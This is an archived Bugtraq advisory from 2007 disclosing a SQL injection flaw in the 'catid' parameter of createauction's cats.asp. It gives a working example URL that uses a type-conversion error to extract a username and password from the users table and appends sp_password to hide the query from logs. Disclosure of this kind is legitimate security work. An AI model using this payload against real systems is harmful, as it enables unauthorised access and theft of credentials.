Bugtraq mailing list archives
createauction (cats.asp) Remote SQL Injection Vulnerability
From: emel_gw_ini () yahoo com
Date: 7 Jan 2007 06:55:07 -0000
createauction (catid) Remote SQL Injection Vulnerability ============================ HItamputih Crew ==================== # hitamputih Advisory # Discovered By : IbnuSina #----------------------------------------------------------- # Software: createauction # Vendor : http://www.createauction.com/ # Method: SQL Injection # Thanks To : akukasih,nyubi,irvian and all #hitamputih crew # [[SQL]]]--------------------------------------------------------- http://[target]/[path]/cats.asp?catid=[SQL] ex: http://[target]/[path]/cats.asp?catid=1%20%20and%201=convert(int,(select%20top%201%20username%2b'/'%2bpassword%20from%20users))--sp_password #########################################################################################
Current thread:
- createauction (cats.asp) Remote SQL Injection Vulnerability emel_gw_ini (Jan 08)